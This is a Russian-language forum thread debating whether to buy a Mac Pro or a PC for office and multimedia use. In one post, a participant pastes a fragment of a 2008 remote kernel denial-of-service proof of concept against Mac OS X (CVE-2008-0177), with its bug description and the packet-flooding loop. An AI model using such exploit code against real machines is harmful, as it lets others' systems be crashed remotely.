Member
Статус: Не в сети Регистрация: 16.04.2006 Откуда: Москва
Кто что думает?? Присматрел мак про за 72000рублей... буду юзать офис и как мультимедия машинку, говорят МАК ос очень надежная и безглючная вещь... вообщем выслушую любые соображения на данный счет. Спасибо заранее!!
Member
HertZ Ну хотя бы пару примеров глюков....?? Да и насколько я понял все пищат от маков..типа все очень просто,шустро и безглючно..на форумы мака идти не хочу был уже там ..полный неадыкват..мак-рулит вот что там пишут а почему?? Ни одного аргумента кроме безглючности!
Member
Статус: Не в сети Регистрация: 18.02.2008 Откуда: MSK
У меня друган на маке сидит, единственое преимущество которое он смог мне толком привести это уровень шума 10dB, а во всём остальном мак кака!!!(которая не стоит своих денег к томуже)
Advanced member
Статус: Не в сети Регистрация: 27.02.2007 Откуда: Москва Фото: 89
Ромчик25 писал(а):
Ну хотя бы пару примеров глюков....?
Фаерволл, не подчиняющийся никаким настройкам, например...
Или вот такой эксплоит, вешающий удаленную МакОСь-машину:
Код:
/* xnu-ipv6-ipcomp.c * * Copyright (c) 2008 by <mu-b@digit-labs.org> * * Apple MACOS X xnu <= 1228.3.13 ipv6-ipcomp remote kernel DoS POC * by mu-b - Sun 24 Feb 2008 * * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) * Apple MACOS X 10.5.2 (xnu-1228.3.13~1/RELEASE_I386) * * ipcomp6_input does not verify the success of the first call * to m_pulldown (m -> md typo?). * * md = m_pulldown(m, off, sizeof(*ipcomp), NULL); * if (!m) { * -> * md = m_pulldown(m, off, sizeof(*ipcomp), NULL); * if (!md) { * (bsd/netinet6/ipcomp_input.c) * * curiosly the same bug exists in ipcomp4_input, but an explicit * check is made to ensure there is enough space for the struct ipcomp. * * Note: bug independently found by Shoichi Sakane of the KAME project. * (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable) * (http://www.kb.cert.org/vuls/id/110947) * (http://www.securityfocus.com/bid/27642) * (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177) * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */
inet_ntop (AF_INET6, &pbuf[IPV6_SRC_OFFSET], ip6_buf, sizeof ip6_buf); printf ("* local ipv6 %s...\n", ip6_buf); printf ("* attacking %s...", argv[1]); for (i = 0; i < HAMMER_NUM; i++) libnet_write_raw_ipv6 (lnsock, pbuf, sizeof pbuf - 1); printf ("done\n");
return (EXIT_SUCCESS); }
Ромчик25 писал(а):
полный неадыкват..мак-рулит вот что там пишут а почему?? Ни одного аргумента кроме безглючности!
Вообще, ты прав, макофилы-очень странные люди. Я не говорю о тех, кому это действительно для работы нужно... Лишь о тех, кто покупает чтобы потом пальцы веером крутить.
Нет безглючных систем, это аксиома. Везде, во всем кому-нибудь нужном находятся баги, и вполне успешно эксплуатируются. Просто где-то их больше, где-то меньше.
Если уж очень хочется UNIX, или он зачем-то нужен, то намного разумнее купить обычный ПК, и поставить туда Linux/BSD... А на сэкономленные деньги купить комплектуху поприличнее.
Advanced member
Ромчик25 писал(а):
HertZ вопрос я четко сформулировал..мак или писи.. третьего не дано...
Я извиняюсь, но ты сейчас отжог. Ибо при установке какой-либо ОС на PC он PC быть не перестанет. Мак = PC.
Ромчик25 писал(а):
Не надол про линухи..
Ты сам начал разговор о системе. Обычный юникс в красивой обертке, со старым ядром к тому же. А геморроя с видюхами, тв-тюнерами и подобными прибамбасами в МакОСи значительно больше, и это факт.
Кто что думает?? Присматрел мак про за 72000рублей... буду юзать офис и как мультимедия машинку, говорят МАК ос очень надежная и безглючная вещь... вообщем выслушую любые соображения на данный счет. Спасибо заранее!!
Бери..и не слушай никого... Люди берут - берут, чертыхаются - да не очень, не сильней чем с виндой и т.п. Кто хочет себе линух пусть ставят и глумятся над всеми остальными тебе до этого дело есть? Ты ж вроде как
Цитата:
буду юзать офис и как мультимедия машинку
для ээтого он прекрасно подходит, понадобится больше - поселишь вторую душу( мак про на тех же комплетухах делается что и обычные компы - тот же конрое до некоторой степени и какой - нить 965:D, и винду туды поставить наверняка можно..линух точно..
Ну не все конечно, в зависимости от времени производства
Зато это из серии - поставил и юзаю..оч даж правильно..а то что переплачивать надо в два раза за такое счастье - ну эт тебе решать
Единственно не могу ничего сказать про очень - да, надежная, глюков особых не встречал...хотя вешать и её можно...тут святых нету
Про комплетыхи - что стоит то не сбоит, ед. мож некоторые особо любимые программки не найдешь под мак, хотя как там дела состят сейчас с эмуляцией - хз...
P.S. - у знакомого майбук от аппл - ну он ниначто не даловолся - все у него работало, просто мой при этом был с x1600 и стоит в два раза дешевле
антиспамер
Статус: Не в сети Регистрация: 09.04.2006 Откуда: Хабаровск!
derek_keiz писал(а):
Зато это из серии - поставил и юзаю..
Если честно у меня и с обычными компьютерами (РС) проблем нет - поставил и юзаю....
Можно от спецов услышать хоть один довод в пользу МАС? Примеры: Суперстабильность, суперпроизводительность (относительно РС), огромное количество легкодоступного прикладного ПО, общедоступный сервис, консультации в любом городе и т.д.
Ромчик25 Это называется мучаться от безделья. За 72 тыс.рублей можно ТАКОЙ!!!! системник с монитором купить, что мас отдохнёт конкретно и надолго.
_________________ А чё, я и без подписи нормально смотрюсь. . .
Advanced member
Макбуки-это отдельная тема... Сравнивал с соней, матрица полное г... по сравнению с vaio.
derek_keiz писал(а):
Кто хочет себе линух пусть ставят и глумятся над всеми остальными тебе до этого дело есть?
Чаще всего происходит наоборот. Покупают маки и глумятся над остальными на форумах и в реальной жизни... В частности, над теми же линуксоидами, называя их малолетними задротами. Согласись, это явно неспроста.
rezOff писал(а):
Что можно поапгрейдить в маке?
Видео и проц, винты, оперативку.
rezOff писал(а):
Разогнать?
Клокгеном можно...
Автору: если ты не просиживаешь день и ночь в Quark Express, Photoshop, Illustrator, то мак тебе объективно не нужен... Это будет просто-напросто вложение денег в микроскоп с последующим забиванием гвоздей. Добавлено спустя 4 минуты, 42 секунды
Member
QSS
Цитата:
Зато это из серии - поставил и юзаю..
и еще одна цитата с другог форума...
Цитата:
Цитата:
А вот это как раз даунгрейд мозга.. типа хочу пива но не хочу за ним топать в магаз..эх мне бы робота че за ним гонял..
Не совсем так. Я занимаюсь другой активной мозговой деятельностью в угоду своему же карману... и когда я заканчиваю этим заниматься меня ждут другие занятия и интересы. К сожелению или к счастью компы из списка моих интересов некоторое время назад вышли... И я не считаю что это очень плохо
вообщем надеюсь по цепочке будет понятно что я хочу сказать про поставил и забыл??? Добавлено спустя 4 минуты, 4 секунды QSS Ну обо.срали меня с позицией мака против писи(на мак форуме)..терь хочу обратную сторону медали услышать...но уже от юзеров ПС
Member
Статус: Не в сети Регистрация: 18.02.2008 Откуда: MSK
Ромчик25 писал(а):
К сожелению или к счастью компы из списка моих интересов некоторое время назад вышли... И я не считаю что это очень плохо
МАК засасывает, друг купил себе новый МАК про (фан Apple и SONY - считайте враг человечества) загнал свой старый МАК и по кускам распродаёт свой обычный (человеческий комп). Короче МАК его засосал и компы его больше не интересуют А всё начинал с первого МАКа в их семье, компа его отца, и вот к чему это приводит А ведь этот парень учил меня разгонять систему
Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 25